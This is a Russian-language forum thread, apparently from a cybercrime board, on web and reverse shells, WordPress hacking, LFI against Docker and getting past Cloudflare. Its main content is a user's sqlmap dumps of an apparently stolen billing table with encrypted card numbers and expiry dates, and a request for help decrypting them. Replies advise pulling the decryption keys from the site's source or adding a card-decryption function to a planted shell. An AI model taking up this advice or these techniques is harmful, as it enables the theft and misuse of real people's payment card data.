Друзья, может здесь или на других бордах есть подробная статья о заливе web/reverse shell и дальнейшей его эксплуатции? Поделитесь пожалуйста
Друзья, может здесь или на других бордах есть подробная статья о заливе web/reverse shell и дальнейшей его эксплуатции? Поделитесь пожалуйста
Ссылки там же на связанные статьи (в конце)![]()
Reverse Shell Cheat Sheet - Internal All The Things
Active Directory and Internal Pentest Cheatsheetsswisskyrepo.github.io
Так же советую ознакомиться
Пробовать и тестить можно напр. с помощью Burp Suite. Для практики:
ознакомься с этим разделом (желательно весь раздел, там не тонны инфы)
![]()
File uploads | Web Security Academy
In this section, you'll learn how simple file upload functions can be used as a powerful vector for a number of high-severity attacks. We'll show you how to ...portswigger.net
Например:
там есть лабы, где ты можешь попрактиковаться по каждому методу (рега фри, в пару кликов, можно юзать любой temp mail сервис).![]()
File uploads | Web Security Academy
In this section, you'll learn how simple file upload functions can be used as a powerful vector for a number of high-severity attacks. We'll show you how to ...portswigger.net
Необходимо для общего понимания, как это работает и\или как это будет работать в твоем случае.
Есть у кого статьи о том как взламывать wp?
Как минимум в них точно хранятся пассы/ключи/итд в открытом видеКто может подсказать, какие сенситив файлы докера можно вытащить через LFI?
ну попробуй зайди на него по айпи, в чём проблема ?В случае нахождения айпи за клаудов или другим вафом, как можно удостовериться что этот айпи принадлежит сайту?
Условно https://1.2.3.4.com?ну попробуй зайди на него по айпи, в чём проблема ?
без .comУсловно https://1.2.3.4.com?
Да я чет ночью протупил, знал что без .ком надо, переклинило чет)1.2.3.4.pizdez
/threads/82843/page-2#post-583305
чекни код сайта попробуй найти строку декрипт , в исходниках, там об функция лежит, а от туда ключи и все дело ищи, как шифруется это добро, нет ризона пытатся как то росшифровать, по моему опыту сс шифруют или аес ключами или так что без кода не росшифруешь.Подскажите пожалуйста, возможно ли восстановить/извлечь/декодировать следующую колонку при разных параметрах дампа..
Если нет то почему.
| billing_id | billing_order_id | billing_account_id | billing_cc_exp | billing_cc_num |
--columns --dump
| 3808 | 6764 | 9766 | 012018 | \xab8\xf2\xeaYN1Uq\x03\xe6\x1f'\x1f\xc8# |
| 3809 | 6767 | 9762 | 012017 | \xaa<\xf6\xef\\M1Tp\x05\xe4\x1f"\x1a\xcb' |
| 3810 | 6768 | 9767 | 082016 | \xab9\xf4\xedZE1Up\x03\xe3\x12%\x18\xcb$ |
| 3811 | 6773 | 7269 | 102017 | \xaa9\xf3\xe0YL8Tw\x06\xe4\x16$\x1f\xce( |
| 3812 | 6774 | 9773 | 072016 | \xaa>\xf4\xeeYE2Wz\x07\xe5\x1f&\x18\xcb# |
| 3813 | 6775 | 5068 | 102017 | \xaa9\xf4\xed[D1Uz\x07\xe1\x11*\x19\xcf( |
--columns --dump --binary-fields="billing_cc_num" --hex
| 3556 | 6375 | 6448 | 122013 | %AA%3E%F6%EA%5DK3%5Cz%0C%E7%13%27%1D%CF%25 |
| 3557 | 6376 | 9331 | 072013 | %AB%3C%F2%E1PO1Ps%05%E3%11%25%1B%CE%23 |
| 3558 | 6377 | 9333 | 032012 | %AD%3A%F3%EDYJ4Qp%01%E6%12%22%1D%CE |
| 3559 | 6379 | 9335 | 042014 | %AB9%F4%EEYK1Tr%01%E7%1E%25%1B%CC%22 |
| 3560 | 6380 | 7759 | 052014 | %AA%3F%F0%EEQH1Us%07%E7%10%2B%1A%C1%26 |
| 3561 | 6381 | 9337 | 082013 | %AA9%F0%EF%5CO6Up%01%E6%11+%18%CE%21 |
--columns --dump --binary-fields="billing_cc_num" --hex
| 3556 | 6375 | 6448 | 122013 | %AA%3E%F6%EA%5DK3%5Cz%0C%E7%13%27%1D%CF%25 |
| 3557 | 6376 | 9331 | 072013 | %AB%3C%F2%E1PO1Ps%05%E3%11%25%1B%CE%23 |
| 3558 | 6377 | 9333 | 032012 | %AD%3A%F3%EDYJ4Qp%01%E6%12%22%1D%CE |
| 3559 | 6379 | 9335 | 042014 | %AB9%F4%EEYK1Tr%01%E7%1E%25%1B%CC%22 |
| 3560 | 6380 | 7759 | 052014 | %AA%3F%F0%EEQH1Us%07%E7%10%2B%1A%C1%26 |
| 3561 | 6381 | 9337 | 082013 | %AA9%F0%EF%5CO6Up%01%E6%11+%18%CE%21 |
--columns --dump --hex--dump
| 3556 | 6375 | 6448 | 122013 | %AA%3E%F6%EA%5DK3%5Cz%0C%E7%13%27%1D%CF%25 |
| 3557 | 6376 | 9331 | 072013 | %AB%3C%F2%E1PO1Ps%05%E3%11%25%1B%CE%23 |
| 3558 | 6377 | 9333 | 032012 | %AD%3A%F3%EDYJ4Qp%01%E6%12%22%1D%CE |
| 3559 | 6379 | 9335 | 042014 | %AB9%F4%EEYK1Tr%01%E7%1E%25%1B%CC%22 |
| 3560 | 6380 | 7759 | 052014 | %AA%3F%F0%EEQH1Us%07%E7%10%2B%1A%C1%26 |
| 3561 | 6381 | 9337 | 082013 | %AA9%F0%EF%5CO6Up%01%E6%11+%18%CE%21 |
--columns --fresh-queries --encoding=windows-1256
| 3557 | 6376 | 9331 | 072013 | ?<??PO1Ps\x05?\x11%\x1b?# |
| 3558 | 6377 | 9333 | 032012 | ?:??YJ4Qp\x01?\x12"\x1d? |
| 3559 | 6379 | 9335 | 042014 | ?9??YK1Tr\x01?\x1e%\x1b?" |
| 3560 | 6380 | 7759 | 052014 | ????QH1Us\x07?\x10+\x1a?& |
| 3561 | 6381 | 9337 | 082013 | ?9??\\O6Up\x01?\x11+\x18?! |
| 3562 | 6382 | 3405 | 112013 | ?9??XN8\\z\x02?\x13+\x15?! |
--columns --dump --fresh-queries --binary-fields="billing_cc_num"
| 3556 | 6375 | 6448 | 122013 | 2541412533452546362545412535444B332535437A253043254537253133253237253144254346253235 |
| 3557 | 6376 | 9331 | 072013 | 254142253343254632254531504F315073253035254533253131253235253142254345253233 |
| 3558 | 6377 | 9333 | 032012 | 254144253341254633254544594A345170253031254536253132253232253144254345 |
| 3559 | 6379 | 9335 | 042014 | 25414239254634254545594B315472253031254537253145253235253142254343253232 |
| 3560 | 6380 | 7759 | 052014 | 2541412533462546302545455148315573253037254537253130253242253141254331253236 |
| 3561 | 6381 | 9337 | 082013 | 254141392546302545462535434F3655702530312545362531312B253138254345253231 |
а может быть поскольку бинари DPAPI шифрование, или это может быть вообще что угодночекни код сайта попробуй найти строку декрипт , в исходниках, там об функция лежит, а от туда ключи и все дело ищи, как шифруется это добро, нет ризона пытатся как то росшифровать, по моему опыту сс шифруют или аес ключами или так что без кода не росшифруешь.
почему 8080? 443если http то ip:80
если https то ip:8080
у меня было бейс64(аес256(ша512))), тут чисто надо брать искать делать, мб х#й что получишь т.к. есть платеги , которые ключи держат у себя на серверах и оно не может быть россшифровано впринципи, смотри код сайта, сейчас карты хранятся мало где и их шифруют или искажают по максимуму, т.к. за это штрафы ебейшие в юса,еу, чисто брейн три хранит чисто первые 4-5 номеров цц остальное все звездочки, некоторые хранят транзакшн ид и так далее, потому надо смотреть код и уже смотреть на месте, может кстати просто прописать в шелле ф-цию росшивроки карт и россшифровать их(если не вышло найти код россшифровки), надо искать запросы к бд в коде связаные с таблицей с картами...а может быть поскольку бинари DPAPI шифрование, или это может быть вообще что угодно